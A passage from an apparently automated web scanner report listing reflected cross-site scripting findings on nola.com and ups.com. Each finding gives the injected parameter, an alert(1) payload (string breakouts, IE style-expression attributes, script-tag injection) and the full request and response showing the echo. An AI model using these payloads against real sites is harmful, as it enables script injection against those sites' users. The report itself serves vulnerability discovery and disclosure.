Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801Yhs4ACnY4

Response

HTTP/1.1 200 OK
Server: Apache
P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM'
ntCoent-Length: 959
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=1
Expires: Mon, 14 Feb 2011 01:36:23 GMT
Date: Mon, 14 Feb 2011 01:36:22 GMT
Connection: close
Content-Length: 959

function Cookie(id, value, days) {
var expiration = new Date();
expiration.setTime(expiration.getTime() + (days*86400000));
document.cookie = id + "=" + value +
        "; expires=" + expiration.toGMTStr
...[SNIP]...
rease number of user visits by one
if (page_views >= 1) {
   page_views++;
}
else {
// or set page view to one
   page_views = 1;
}

// set or update cookie
var work = new Cookie("POPUNDER", page_views, 165478;alert(1)//a1064b052ee);

1.284. http://www.nola.com/cgi-bin/donotcount/formatp.cgi/dhtml/jspop/jspop.ata [NAME parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nola.com
Path:	/cgi-bin/donotcount/formatp.cgi/dhtml/jspop/jspop.ata

Issue detail

The value of the NAME request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82da5"%3balert(1)//506e845993d was submitted in the NAME parameter. This input was echoed as 82da5";alert(1)//506e845993d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/donotcount/formatp.cgi/dhtml/jspop/jspop.ata?NAME=POPUNDER82da5"%3balert(1)//506e845993d&EXP=1 HTTP/1.1
Host: www.nola.com
Proxy-Connection: keep-alive
Referer: http://www.nola.com/crime/index.ssf/2011/02/new_orleans_pizza_delivery_man.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801Yhs4ACnY4

Response

HTTP/1.1 200 OK
Server: Apache
P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM'
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=1
Expires: Mon, 14 Feb 2011 01:36:23 GMT
Date: Mon, 14 Feb 2011 01:36:22 GMT
Connection: close
Content-Length: 988

function Cookie(id, value, days) {
var expiration = new Date();
expiration.setTime(expiration.getTime() + (days*86400000));
document.cookie = id + "=" + value +
"; expires=" + expiration.toGMTString() + ";domain=.nola.com;path=/;";
}

var allcookies = document.cookie;

// Check for this exact cookie
// in case there are more than one on this page

var id = "POPUNDER82da5";alert(1)//506e845993d";

var start = allcookies.indexOf(id + "=");

// if cookie exists substring the number of user visits from the value string
if (start != -1) {
start += id.length +1;
var end = allcookies.indexOf(";",
...[SNIP]...

1.285. http://www.ups.com/bussol [WT.svl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/bussol

Issue detail

The value of the WT.svl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b8d1"style%3d"x%3aexpression(alert(1))"f4e955ab522 was submitted in the WT.svl parameter. This input was echoed as 5b8d1"style="x:expression(alert(1))"f4e955ab522 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bussol?loc=en_US&WT.svl=PriNav5b8d1"style%3d"x%3aexpression(alert(1))"f4e955ab522 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:38 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=GJq1NYGSyJt6JdGvfWmChTLqL4mM8L6MNmYnGczyNNgN81gH90Bh!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17883

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="unKnown"
value="&WT.svl=PriNav5b8d1"style="x:expression(alert(1))"f4e955ab522&loc=en_US" />
...[SNIP]...

1.286. http://www.ups.com/bussol [actionID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/bussol

Issue detail

The value of the actionID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82a1a"style%3d"x%3aexpression(alert(1))"0a64840504b was submitted in the actionID parameter. This input was echoed as 82a1a"style="x:expression(alert(1))"0a64840504b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bussol?loc=en_US&viewID=productView&contentID=ct1_sol_sol_int_ship&actionID=videoDemo82a1a"style%3d"x%3aexpression(alert(1))"0a64840504b HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:49 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=vG56NYGdQ5B2RJl7qh78jHpwwn9S1MV1h7C7HmynpjtF7QnySHrQ!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18141

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="bspa_actionID"
value="videoDemo82a1a"style="x:expression(alert(1))"0a64840504b" />
...[SNIP]...

1.287. http://www.ups.com/bussol [actionID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/bussol

Issue detail

The value of the actionID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c518"%3balert(1)//e6dfe32ce27 was submitted in the actionID parameter. This input was echoed as 5c518";alert(1)//e6dfe32ce27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bussol?loc=en_US&viewID=productView&contentID=ct1_sol_sol_int_ship&actionID=videoDemo5c518"%3balert(1)//e6dfe32ce27 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:50 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=pfl9NYGpRJ3bMG8jFM0yWChjmFpqfrrMrWGLp4snQtvC3TqTs6nF!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18084

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
           "name", "bussol",
           "allowScriptAccess","sameDomain",
           "type", "application/x-shockwave-flash",
           "pluginspage", "http://www.adobe.com/go/getflashplayer",
           "FlashVars", "actionID=videoDemo5c518";alert(1)//e6dfe32ce27&bspa_xmlRoot=/xml/ria/na/us/en/bussol/&contentID=ct1_sol_sol_int_ship&hash=1297646750072&loc=en_US&v=2.0.4&viewID=productView"
   );
} else { // flash is too old or we can't detect the plugin
   docum
...[SNIP]...

1.288. http://www.ups.com/bussol [contentID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/bussol

Issue detail

The value of the contentID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b611e"style%3d"x%3aexpression(alert(1))"ed7c494a92e was submitted in the contentID parameter. This input was echoed as b611e"style="x:expression(alert(1))"ed7c494a92e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bussol?loc=en_US&viewID=productView&contentID=ct1_sol_sol_int_shipb611e"style%3d"x%3aexpression(alert(1))"ed7c494a92e&actionID=videoDemo HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:46 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=gLGfNYGh1ll4WyP7f1Tpp4QnQqhjxhJcszfLYXrwGrTqNnnQTvK3!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18141

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="bspa_contentID"
value="ct1_sol_sol_int_shipb611e"style="x:expression(alert(1))"ed7c494a92e" />
...[SNIP]...

1.289. http://www.ups.com/bussol [contentID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/bussol

Issue detail

The value of the contentID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 400cb"%3balert(1)//b2edff9e689 was submitted in the contentID parameter. This input was echoed as 400cb";alert(1)//b2edff9e689 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bussol?loc=en_US&viewID=productView&contentID=ct1_sol_sol_int_ship400cb"%3balert(1)//b2edff9e689&actionID=videoDemo HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:47 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=83XvNYGb1b1Q810cT9c3B7yvfQTw2h92pNzmJzZT72QYZ4Zf74fs!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18084

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
"application/x-shockwave-flash",
           "pluginspage", "http://www.adobe.com/go/getflashplayer",
           "FlashVars", "actionID=videoDemo&bspa_xmlRoot=/xml/ria/na/us/en/bussol/&contentID=ct1_sol_sol_int_ship400cb";alert(1)//b2edff9e689&hash=1297646747167&loc=en_US&v=2.0.4&viewID=productView"
   );
} else { // flash is too old or we can't detect the plugin
   document.getElementById("noflashdiv").style.display = "block";
}
</script
...[SNIP]...

1.290. http://www.ups.com/bussol [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/bussol

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 447f7"%3balert(1)//99f06ff3db6 was submitted in the loc parameter. This input was echoed as 447f7";alert(1)//99f06ff3db6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bussol?loc=en_US447f7"%3balert(1)//99f06ff3db6&WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:37 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=2PvYNYGRRBhwJYyp24HblqFn9bTTQTC64XDGXYWs2YQyywJx17pG!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17948

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
eDomain",
           "type", "application/x-shockwave-flash",
           "pluginspage", "http://www.adobe.com/go/getflashplayer",
           "FlashVars", "bspa_xmlRoot=/xml/ria/na/us/en/bussol/&hash=1297646737274&loc=en_US447f7";alert(1)//99f06ff3db6&v=2.0.4"
   );
} else { // flash is too old or we can't detect the plugin
   document.getElementById("noflashdiv").style.display = "block";
}
</script>
...[SNIP]...

1.291. http://www.ups.com/bussol [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/bussol

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4508"style%3d"x%3aexpression(alert(1))"db0ed3f5143 was submitted in the loc parameter. This input was echoed as c4508"style="x:expression(alert(1))"db0ed3f5143 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bussol?loc=en_USc4508"style%3d"x%3aexpression(alert(1))"db0ed3f5143&WT.svl=PriNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=DWTzNYGQHR1jTpLtNvBGDZLcL5q5CvJp349WjJvcM9Y1g2VCjvJ0!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18024

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="unKnown"
value="&WT.svl=PriNav&loc=en_USc4508"style="x:expression(alert(1))"db0ed3f5143" />
...[SNIP]...

1.292. http://www.ups.com/bussol [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/bussol

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50f65"><script>alert(1)</script>5b1105e1d12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bussol?50f65"><script>alert(1)</script>5b1105e1d12=1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=p12cNYGQVCmgTrnxV82pBjBNpyBnQNMFsg2WXBQNQ5kNp7dN0vmk!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17904

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="unKnown"
value="&50f65"><script>alert(1)</script>5b1105e1d12=1" />
...[SNIP]...

1.293. http://www.ups.com/bussol [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/bussol

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4488"%3balert(1)//40eab8ba899 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f4488";alert(1)//40eab8ba899 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bussol?f4488"%3balert(1)//40eab8ba899=1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:38 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=hHRGNYGSG1qFq2p455VVvbKsh2Tl2HnHLFP4JjVGC8gGh3JzhfQS!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17874

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...

           "allowScriptAccess","sameDomain",
           "type", "application/x-shockwave-flash",
           "pluginspage", "http://www.adobe.com/go/getflashplayer",
           "FlashVars", "bspa_xmlRoot=/xml/ria/na/us/en/bussol/&f4488";alert(1)//40eab8ba899=1&hash=1297646738736&loc=en_US&v=2.0.4"
   );
} else { // flash is too old or we can't detect the plugin
   document.getElementById("noflashdiv").style.display = "block";
}
</script>
...[SNIP]...

1.294. http://www.ups.com/bussol [viewID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/bussol

Issue detail

The value of the viewID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 146aa"%3balert(1)//bd3493845d2 was submitted in the viewID parameter. This input was echoed as 146aa";alert(1)//bd3493845d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bussol?loc=en_US&viewID=productView146aa"%3balert(1)//bd3493845d2&contentID=ct1_sol_sol_int_ship&actionID=videoDemo HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:43 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=rzNnNYGXg4SD00mpLyKTNYqkqnGB6nQpPPbbP0rsHMWZNB4nGR5N!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18084

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
tp://www.adobe.com/go/getflashplayer",
           "FlashVars", "actionID=videoDemo&bspa_xmlRoot=/xml/ria/na/us/en/bussol/&contentID=ct1_sol_sol_int_ship&hash=1297646743669&loc=en_US&v=2.0.4&viewID=productView146aa";alert(1)//bd3493845d2"
   );
} else { // flash is too old or we can't detect the plugin
   document.getElementById("noflashdiv").style.display = "block";
}
</script>
...[SNIP]...

1.295. http://www.ups.com/bussol [viewID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/bussol

Issue detail

The value of the viewID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84d0b"style%3d"x%3aexpression(alert(1))"f75fdcc79ee was submitted in the viewID parameter. This input was echoed as 84d0b"style="x:expression(alert(1))"f75fdcc79ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bussol?loc=en_US&viewID=productView84d0b"style%3d"x%3aexpression(alert(1))"f75fdcc79ee&contentID=ct1_sol_sol_int_ship&actionID=videoDemo HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:41 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=kfpyNYGVyJYcd5nzxs2wgPQkWb7XT8vVtlpnGtZn3Y1yHCd2cJCC!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18141

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="bspa_viewID"
value="productView84d0b"style="x:expression(alert(1))"f75fdcc79ee" />
...[SNIP]...

1.296. http://www.ups.com/bussol/ [WT.svl parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/bussol/

Issue detail

The value of the WT.svl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38a59"style%3d"x%3aexpression(alert(1))"6e9610dfaef was submitted in the WT.svl parameter. This input was echoed as 38a59"style="x:expression(alert(1))"6e9610dfaef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bussol/?loc=en_US&viewID=browseView&WT.svl=PriNav38a59"style%3d"x%3aexpression(alert(1))"6e9610dfaef&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:42 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=hg8jNYGW0m7dsy3WYSgLQ7QfjtzHmgCvtyjGk22JY61HnP3QQr8J!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17929

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="unKnown"
value="&viewID=browseView&WT.svl=PriNav38a59"style="x:expression(alert(1))"6e9610dfaef&loc=en_US" />
...[SNIP]...

1.297. http://www.ups.com/bussol/ [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/bussol/

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ba38"%3balert(1)//d52a61ceed4 was submitted in the loc parameter. This input was echoed as 3ba38";alert(1)//d52a61ceed4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bussol/?loc=en_US3ba38"%3balert(1)//d52a61ceed4&viewID=browseView&WT.svl=PriNav&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=HBsWNYGQkl1y5dT46xdvnXNbdJG3FS5Y0hxDRT3g58MGvMpT1v2k!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17994

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
eDomain",
           "type", "application/x-shockwave-flash",
           "pluginspage", "http://www.adobe.com/go/getflashplayer",
           "FlashVars", "bspa_xmlRoot=/xml/ria/na/us/en/bussol/&hash=1297646736921&loc=en_US3ba38";alert(1)//d52a61ceed4&v=2.0.4&viewID=browseView"
   );
} else { // flash is too old or we can't detect the plugin
   document.getElementById("noflashdiv").style.display = "block";
}
</script>
...[SNIP]...

1.298. http://www.ups.com/bussol/ [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/bussol/

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2cb0"style%3d"x%3aexpression(alert(1))"1a12ccdf313 was submitted in the loc parameter. This input was echoed as e2cb0"style="x:expression(alert(1))"1a12ccdf313 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bussol/?loc=en_USe2cb0"style%3d"x%3aexpression(alert(1))"1a12ccdf313&viewID=browseView&WT.svl=PriNav&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=McY2NYGQB3Plb5QJJ76xlt1TsfghpCJGBL82fYy9TZl3kByrnsDK!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
